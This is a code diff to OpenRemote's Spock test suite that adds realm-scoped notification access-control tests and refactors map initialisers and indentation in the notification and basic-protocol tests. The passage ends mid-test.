+    ownSent[0].type == EmailNotificationMessage.TYPE
+    ownSent[0].target == Notification.TargetType.USER
+    ownSent[0].targetId == buildingUserId
+    ownSent[0].source == Notification.Source.REALM_RULESET
+    ownSent[0].sourceId == buildingRealm
+    ownSent[0].realm == buildingRealm
+    (ownSent[0].message as EmailNotificationMessage).subject == "Realm access test"
+    // being restricted, they don't see notifications addressed to other users in the realm
+    !ownNotifications.any { it.targetId == testuser2Id }
+    !ownNotifications.any { it.targetId == notifUserId }
+
+    when: "a non-restricted user whose only granting role is read:notifications requests their realm's notifications"
+    def notifUserResponse = requestNotificationsByRealm(buildingRealm, notifUserAccessToken, buildingRealm)
+    def notifNotifications = notifUserResponse.readEntity(SentNotification[].class)
+    notifUserResponse.close()
+    def notifSent = notifNotifications.findAll { it.name == "RealmAccessTest" }
+
+    then: "read:notifications lets a non-restricted user read ALL of the realm's notifications, but ids are sanitized without read:users/read:assets"
+    notifUserResponse.status == 200
+    // unlike the restricted user, they see every recipient's notification in the realm, not just their own
+    notifSent.size() == 3
+    notifSent.collect { it.target }.toSet() == [Notification.TargetType.USER].toSet()
+    notifSent.every { it.name == "RealmAccessTest" }
+    notifSent.every { it.type == EmailNotificationMessage.TYPE }
+    notifSent.every { it.source == Notification.Source.REALM_RULESET }
+    notifSent.every { it.realm == buildingRealm }
+    notifSent.every { (it.message as EmailNotificationMessage).subject == "Realm access test" }
+    // without read:users the recipient ids are stripped; realm ruleset source ids are realm names and stay visible
+    notifSent.every { it.targetId == null }
+    notifSent.every { it.sourceId == buildingRealm }
+
+    when: "a non-restricted building user requests notifications for the master realm they cannot access"
+    def otherRealmResponse = requestNotificationsByRealm(buildingRealm, notifUserAccessToken, MASTER_REALM)
+
+    then: "access is forbidden — even a non-restricted user cannot read another realm's notifications"
+    otherRealmResponse.status == 403
+    otherRealmResponse.close()
+
+    when: "a user with read:notifications requests notifications without specifying a realm"
+    def noRealmResponse = getClientApiTarget(serverUri(serverPort), buildingRealm, buildingUserAccessToken)
+            .path("notification")
+            .request().get()
+    def noRealmSent = noRealmResponse.readEntity(SentNotification[].class).findAll {
+      it.name == "RealmAccessTest"
+    }
+
+    then: "the query defaults to the caller's own realm rather than failing"
+    noRealmResponse.status == 200
+    // the restricted building user still only sees the notification targeting them
+    noRealmSent.size() == 1
+    noRealmSent[0].targetId == buildingUserId
+    noRealmResponse.close()
+
+    when: "an email notification is sent to the entire master realm"
+    def masterNotification = new Notification(
+            "MasterRealmAccessTest",
+            new EmailNotificationMessage().setSubject("Master realm test").setText("Hello master"),
+            Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)), null, null)
+    notificationService.sendNotification(masterNotification, Notification.Source.REALM_RULESET, MASTER_REALM)
+
+    then: "it is persisted against the master realm"
+    conditions.eventually {
+      assert notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() > 0
+    }
+
+    when: "a realm admin of the building realm tries to delete the master realm's notifications"
+    def masterCount = notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size()
+    def crossRealmDelete = deleteNotifications(buildingRealm, testuser4AccessToken, [realmId: MASTER_REALM, type: EmailNotificationMessage.TYPE])
+
+    then: "the request is forbidden and the master realm's notifications are untouched"
+    crossRealmDelete.status == 403
+    crossRealmDelete.close()
+    notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() == masterCount
+
+    when: "a realm admin of the building realm tries to delete a single master realm notification by id"
+    def masterNotificationId = notificationsNamed(MASTER_REALM, "MasterRealmAccessTest")[0].id
+    def byIdDelete = deleteNotificationById(buildingRealm, testuser4AccessToken, masterNotificationId)
+
+    then: "the request is forbidden and the notification remains"
+    byIdDelete.status == 403
+    byIdDelete.close()
+    notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").any {
+      it.id == masterNotificationId
+    }
+
+    when: "the superuser deletes a notification that doesn't exist"
+    def missingDelete = deleteNotificationById(MASTER_REALM, adminAccessToken, Long.MAX_VALUE)
+
+    then: "the notification is reported as not found"
+    missingDelete.status == 404
+    missingDelete.close()
+
+    when: "a realm admin of the building realm deletes notifications by type without specifying a realm"
+    def ownRealmDelete = deleteNotifications(buildingRealm, testuser4AccessToken, [type: EmailNotificationMessage.TYPE])
+
+    then: "only their own realm's notifications are deleted"
+    ownRealmDelete.status == 204
+    ownRealmDelete.close()
+    notificationsNamed(buildingRealm, "RealmAccessTest").isEmpty()
+    notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").size() == masterCount
+
+    when: "the superuser deletes notifications by type"
+    def superUserDelete = deleteNotifications(MASTER_REALM, adminAccessToken, [type: EmailNotificationMessage.TYPE])
+
+    then: "the delete is not confined to a realm"
+    superUserDelete.status == 204
+    superUserDelete.close()
+    notificationsNamed(MASTER_REALM, "MasterRealmAccessTest").isEmpty()
+
+    cleanup: "the mock is removed"
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/notification/NotificationTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/notification/NotificationTest.groovy
@@ -162,9 +162,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "Test Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -172,8 +171,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -181,9 +180,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        ))
-                    }
-                },
+                        )
+                ),
                 "",
                 ["manager"] as String[])
         def testuser2Console = testuser2ConsoleResource.register(null, consoleRegistration)
@@ -809,10 +807,10 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "MultiLanguageAction",
                 new LocalizedNotificationMessage(
                         "en",
-                        new HashMap<String, AbstractNotificationMessage>() {{
-                            put("nl", new PushNotificationMessage("Nederlandse titel", "Nederlandse body", null, null, null))
-                            put("en", new PushNotificationMessage("English title", "English body", null, null, null))
-                        }}
+                        new HashMap<String, AbstractNotificationMessage>(
+                            nl: new PushNotificationMessage("Nederlandse titel", "Nederlandse body", null, null, null),
+                            en: new PushNotificationMessage("English title", "English body", null, null, null)
+                        )
                 ),
                 null,
                 null,
@@ -827,9 +825,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "Admin Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -837,8 +834,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -846,9 +843,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        ))
-                    }
-                },
+                        )
+                ),
                 "",
                 ["manager"] as String[])
         def adminConsole = adminConsoleResource.register(null, consoleRegistration)
@@ -913,9 +909,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "Test user 1 Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -923,8 +918,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -932,9 +927,8 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                                 true,
                                 false,
                                 (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        ))
-                    }
-                },
+                        )
+                ),
                 "",
                 ["manager"] as String[])
         def testuser1Console = testuser1ConsoleResource.register(null, testuser1ConsoleRegistration)
@@ -1003,10 +997,10 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "MultiTypeAction",
                 new LocalizedNotificationMessage(
                         "en",
-                        new HashMap<String, AbstractNotificationMessage>() {{
-                            put("en", new PushNotificationMessage("English title", "English body", null, null, null))
-                            put("nl", new EmailNotificationMessage().setSubject("Nederlandse titel").setText("Nederlandse tekst"))
-                        }}
+                        new HashMap<String, AbstractNotificationMessage>(
+                            en: new PushNotificationMessage("English title", "English body", null, null, null),
+                            nl: new EmailNotificationMessage().setSubject("Nederlandse titel").setText("Nederlandse tekst")
+                        )
                 ),
                 null,
                 null,
@@ -1067,10 +1061,10 @@ class NotificationTest extends Specification implements ManagerContainerTrait {
                 "InvalidNotification",
                 new LocalizedNotificationMessage(
                         "en",
-                        new HashMap<String, AbstractNotificationMessage>() {{
-                            put("nl", new PushNotificationMessage())
-                            put("en", new PushNotificationMessage("English title", "English body", null, null, null))
-                        }}
+                        new HashMap<String, AbstractNotificationMessage>(
+                            nl: new PushNotificationMessage(),
+                            en: new PushNotificationMessage("English title", "English body", null, null, null)
+                        )
                 ),
                 null,
                 null,

--- a/test/src/test/groovy/org/openremote/test/protocol/BasicProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/BasicProtocolTest.groovy
@@ -57,466 +57,468 @@ import static org.openremote.model.value.MetaItemType.*
  */
 class BasicProtocolTest extends Specification implements ManagerContainerTrait {
 
-    def "Check basic protocol linking/un-linking and value writing"() {
+  def "Check basic protocol linking/un-linking and value writing"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
-        Map<String, Integer> protocolExpectedLinkedAttributeCount = [:]
-        protocolExpectedLinkedAttributeCount["mockAgent1"] = 8
-        protocolExpectedLinkedAttributeCount["mockAgent2"] = 2
-        protocolExpectedLinkedAttributeCount["mockAgent3"] = 2
-        protocolExpectedLinkedAttributeCount['mockConfig4'] = 2
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
+    Map<String, Integer> protocolExpectedLinkedAttributeCount = [:]
+    protocolExpectedLinkedAttributeCount["mockAgent1"] = 8
+    protocolExpectedLinkedAttributeCount["mockAgent2"] = 2
+    protocolExpectedLinkedAttributeCount["mockAgent3"] = 2
+    protocolExpectedLinkedAttributeCount['mockConfig4'] = 2
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
 
-        when: "several mock agents that uses the mock protocol are created"
-        def mockAgent1 = new MockAgent("Mock agent 1")
+    when: "several mock agents that uses the mock protocol are created"
+    def mockAgent1 = new MockAgent("Mock agent 1")
             .setRealm(MASTER_REALM)
             .setRequired(true)
-        mockAgent1 = assetStorageService.merge(mockAgent1)
+    mockAgent1 = assetStorageService.merge(mockAgent1)
 
-        def mockAgent2 = new MockAgent("Mock agent 2")
+    def mockAgent2 = new MockAgent("Mock agent 2")
             .setRealm(MASTER_REALM)
             .setRequired(true)
             .setDisabled(true)
-        mockAgent2 = assetStorageService.merge(mockAgent2)
+    mockAgent2 = assetStorageService.merge(mockAgent2)
 
-        def mockAgent3 = new MockAgent("Mock agent 3")
+    def mockAgent3 = new MockAgent("Mock agent 3")
             .setRealm(MASTER_REALM)
-        mockAgent3 = assetStorageService.merge(mockAgent3)
+    mockAgent3 = assetStorageService.merge(mockAgent3)
 
-        then: "the protocol instances should have been created and the agent status attributes should be updated"
-        conditions.eventually {
-            assert agentService.agents.values().count {it instanceof MockAgent} == 3
-            assert agentService.protocolInstanceMap.values().count {it instanceof MockProtocol} == 1
-            assert agentService.getAgent(mockAgent1.id) != null
-            assert agentService.getAgent(mockAgent2.id) != null
-            assert agentService.getAgent(mockAgent3.id) != null
-            assert agentService.getProtocolInstance(mockAgent1.id) != null
-            assert agentService.getProtocolInstance(mockAgent2.id) == null
-            assert agentService.getProtocolInstance(mockAgent3.id) == null
-            assert agentService.getAgent(mockAgent1.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            assert agentService.getAgent(mockAgent2.id).getAgentStatus().orElse(null) == ConnectionStatus.DISABLED
-            assert agentService.getAgent(mockAgent3.id).getAgentStatus().orElse(null) == ConnectionStatus.ERROR
-        }
+    then: "the protocol instances should have been created and the agent status attributes should be updated"
+    conditions.eventually {
+      assert agentService.agents.values().count {it instanceof MockAgent} == 3
+      assert agentService.protocolInstanceMap.values().count {it instanceof MockProtocol} == 1
+      assert agentService.getAgent(mockAgent1.id) != null
+      assert agentService.getAgent(mockAgent2.id) != null
+      assert agentService.getAgent(mockAgent3.id) != null
+      assert agentService.getProtocolInstance(mockAgent1.id) != null
+      assert agentService.getProtocolInstance(mockAgent2.id) == null
+      assert agentService.getProtocolInstance(mockAgent3.id) == null
+      assert agentService.getAgent(mockAgent1.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      assert agentService.getAgent(mockAgent2.id).getAgentStatus().orElse(null) == ConnectionStatus.DISABLED
+      assert agentService.getAgent(mockAgent3.id).getAgentStatus().orElse(null) == ConnectionStatus.ERROR
+    }
 
-        when: "a mock thing asset is created that links to the mock agents"
-        def mockThing = new ThingAsset("Mock Thing Asset")
+    when: "a mock thing asset is created that links to the mock agents"
+    def mockThing = new ThingAsset("Mock Thing Asset")
             .setRealm(MASTER_REALM)
 
-        mockThing.addOrReplaceAttributes(
+    mockThing.addOrReplaceAttributes(
             new Attribute<>("lightToggle1", BOOLEAN)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("tempTarget1", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("invalidToggle1", BOOLEAN)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
-                    )
-                ),
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
+                            )
+                    ),
             new Attribute<>("lightToggle2", BOOLEAN)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent2.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent2.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("tempTarget2", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent2.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent2.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("lightToggle3", BOOLEAN)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent3.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent3.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("tempTarget3", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent3.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent3.id)
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("invalidToggle5", BOOLEAN, false)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink("invalid id")
+                            AGENT_LINK,
+                            new MockAgentLink("invalid id")
                             .setRequiredValue("true")
-                    )
-                ),
+                            )
+                    ),
             new Attribute<>("plainAttribute", TEXT, "demo")
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(READ_ONLY, true)
-                ),
+                    ),
             new Attribute<>("filterRegex", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
                             .setValueFilters(
-                                [
-                                    new RegexValueFilter(Pattern.compile("\\w(\\d+)")).setMatchGroup(1).setMatchIndex(2)
-                                ] as ValueFilter[]
+                                    [
+                                      new RegexValueFilter(Pattern.compile("\\w(\\d+)")).setMatchGroup(1).setMatchIndex(2)
+                                    ] as ValueFilter[]
+                                    )
                             )
-                    )
-                ),
-                new Attribute<>("filterMath", NUMBER)
-                    .addOrReplaceMeta(
-                            new MetaItem<>(
-                                    AGENT_LINK,
-                                    new MockAgentLink(mockAgent1.id)
-                                            .setRequiredValue("true")
-                                            .setValueFilters(
-                                                    [
-                                                            new MathExpressionValueFilter("(x+500)*0.1")
-                                                    ] as ValueFilter[]
-                                            )
+                    ),
+            new Attribute<>("filterMath", NUMBER)
+            .addOrReplaceMeta(
+                    new MetaItem<>(
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
+                            .setRequiredValue("true")
+                            .setValueFilters(
+                                    [
+                                      new MathExpressionValueFilter("(x+500)*0.1")
+                                    ] as ValueFilter[]
+                                    )
                             )
                     ),
             new Attribute<>("filterSubstring", TEXT)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
-                        .setValueFilters(
-                            [
-                                new SubStringValueFilter(10, 12)
-                            ] as ValueFilter[]
-                        )
-                    )
-                ),
+                            .setValueFilters(
+                                    [new SubStringValueFilter(10, 12)] as ValueFilter[]
+                                    )
+                            )
+                    ),
             new Attribute<>("filterRegexSubstring", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
                             .setValueFilters(
-                                [
-                                    new SubStringValueFilter(23),
-                                    new RegexValueFilter(Pattern.compile("[a-z|\\s]+(\\d+)%\"}")).setMatchGroup(1)
-                                ] as ValueFilter[]
+                                    [
+                                      new SubStringValueFilter(23),
+                                      new RegexValueFilter(Pattern.compile("[a-z|\\s]+(\\d+)%\"}")).setMatchGroup(1)
+                                    ] as ValueFilter[]
+                                    )
                             )
-                        )
-            ),
+                    ),
             new Attribute<>("readWriteMath", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
                             .setValueFilters(
-                                [
-                                    new MathExpressionValueFilter("x*10")
-                                ] as ValueFilter[]
-                            )
+                                    [
+                                      new MathExpressionValueFilter("x*10")
+                                    ] as ValueFilter[]
+                                    )
                             .setWriteValueFilters(
-                                [
-                                    new MathExpressionValueFilter("x/10")
-                                ] as ValueFilter[]
+                                    [
+                                      new MathExpressionValueFilter("x/10")
+                                    ] as ValueFilter[]
+                                    )
                             )
-                    )
-                ),
+                    ),
             new Attribute<>("readWriteRegex", NUMBER)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(
-                        AGENT_LINK,
-                        new MockAgentLink(mockAgent1.id)
+                            AGENT_LINK,
+                            new MockAgentLink(mockAgent1.id)
                             .setRequiredValue("true")
                             .setValueFilters(
-                                [
-                                    new RegexValueFilter(Pattern.compile("temp=(\\d+)")).setMatchGroup(1)
-                                ] as ValueFilter[]
-                            )
+                                    [
+                                      new RegexValueFilter(Pattern.compile("temp=(\\d+)")).setMatchGroup(1)
+                                    ] as ValueFilter[]
+                                    )
                             .setWriteValueFilters(
-                                [
-                                    new RegexValueFilter(Pattern.compile("^(\\d+)\$")).setMatchGroup(1)
-                                ] as ValueFilter[]
+                                    [
+                                      new RegexValueFilter(Pattern.compile("^(\\d+)\$")).setMatchGroup(1)
+                                    ] as ValueFilter[]
+                                    )
                             )
                     )
-                )
-        )
+            )
 
-        mockThing = assetStorageService.merge(mockThing)
+    mockThing = assetStorageService.merge(mockThing)
 
-        then: "the mock thing to be fully deployed in the correct order"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(mockAgent1.id) != null
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.size() == 10
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(0) == "START"
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(1).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(2).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(3).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(4).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(5).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(6).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(7).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(8).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(9).startsWith("LINK_ATTRIBUTE")
-            assert agentService.getProtocolInstance(mockAgent1.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent1"]
-        }
-
-        and: "invalid attribute should not actually have been linked"
-        assert !((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).linkedAttributes.any {it.value.name == "invalidToggle1"}
-
-        when: "values are sent to the linked attributes by the protocol"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "lightToggle1"), true, null)
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "tempTarget1"), 25.5d, null)
-
-        then: "the linked attributes values should have been updated by the protocol"
-        conditions.eventually {
-            def mockAsset = assetStorageService.find(mockThing.id, true)
-            // Check all valid linked attributes have the new values
-            assert mockAsset.getAttribute("lightToggle1").flatMap{it.getValue()}.orElse(false)
-            assert mockAsset.getAttribute("tempTarget1").flatMap{it.getValue()}.orElse(0d) == 25.5d
-            // Check invalid attributes don't have the new values
-            assert !mockAsset.getAttribute("lightToggle2").get().getValue().isPresent()
-            assert !mockAsset.getAttribute("tempTarget2").get().getValue().isPresent()
-            assert !mockAsset.getAttribute("lightToggle3").get().getValue().isPresent()
-            assert !mockAsset.getAttribute("tempTarget3").get().getValue().isPresent()
-        }
-
-        when: "the disabled agent is enabled"
-        mockAgent2.setDisabled(false)
-        mockAgent2 = assetStorageService.merge(mockAgent2)
-
-        then: "a protocol instance should exist and attributes should be linked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(mockAgent2.id) != null
-            assert agentService.getProtocolInstance(mockAgent2.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent2"]
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.size() == 3
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(0) == "START"
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(1).startsWith("LINK_ATTRIBUTE")
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(2).startsWith("LINK_ATTRIBUTE")
-        }
-
-        when: "a linked attribute is removed"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.clear()
-        mockThing = assetStorageService.find(mockThing.id, true)
-        mockThing.getAttributes().remove("lightToggle1")
-        mockThing = assetStorageService.merge(mockThing)
-
-        then: "the protocol should not be stopped but the attribute should be unlinked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(mockAgent1.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent1"] - 1
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.size() == 1
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.any {it == "UNLINK_ATTRIBUTE:${mockThing.id}:lightToggle1"}
-            assert !((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).linkedAttributes.containsKey(new AttributeRef(mockThing.id, "invalidToggle1"))
-        }
-
-        when: "an agent is removed"
-        def mockProtocol2 = (MockProtocol)agentService.getProtocolInstance(mockAgent2.id)
-        mockProtocol2.protocolMethodCalls.clear()
-        assetStorageService.delete([mockAgent2.id])
-
-        then: "the attributes should be unlinked then the protocol stopped"
-        conditions.eventually {
-            assert mockProtocol2.protocolMethodCalls.size() == 3
-            assert mockProtocol2.protocolMethodCalls.get(0).startsWith("UNLINK_ATTRIBUTE")
-            assert mockProtocol2.protocolMethodCalls.get(1).startsWith("UNLINK_ATTRIBUTE")
-            assert mockProtocol2.protocolMethodCalls.get(2) == "STOP"
-        }
-
-        and: "the protocol instance and agent should be removed"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(mockAgent2.id) == null
-        }
-
-        when: "the mock protocol tries to update the plain readonly attribute"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateAttribute(new AttributeState(mockThing.id,"plainAttribute", "UPDATE"))
-
-        then: "the plain attributes value should be updated"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert mockThing.getAttribute("plainAttribute").get().getValue().orElse("") == "UPDATE"
-        }
-
-        when: "a target temp linked attribute value is updated it should reach the protocol"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "tempTarget1", 30d))
-
-        then: "the update should reach the protocol as an attribute write request"
-        conditions.eventually {
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 1
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).name == "tempTarget1"
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).ref.id == mockThing.id
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).value.orElse(null) == 30d
-        }
-
-        then: "the target temp attributes value should be updated"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
-            assert mockThing.getAttribute("tempTarget1").get().getValue(Double.class).orElse(0d) == 30d
-        }
-
-        when: "a sensor value is received that links to an attribute using a regex filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "s100 d56 g1212", null)
-
-        then: "the linked attributes value should be updated with the filtered result"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
-            assert mockThing.getAttribute("filterRegex").get().getValue(Double.class).orElse(0d) == 1212d
-        }
-
-        when: "the same attribute receives a sensor value that doesn't match the regex filter (match index invalid)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "s100", null)
-
-        then: "the linked attributes value should be updated to null"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert !mockThing.getAttribute("filterRegex").get().getValue().isPresent()
-        }
-
-        when: "the same attribute receives a sensor value that doesn't match the regex filter (no match)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "no match to be found!", null)
-
-        then: "the linked attributes value should be updated to null"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
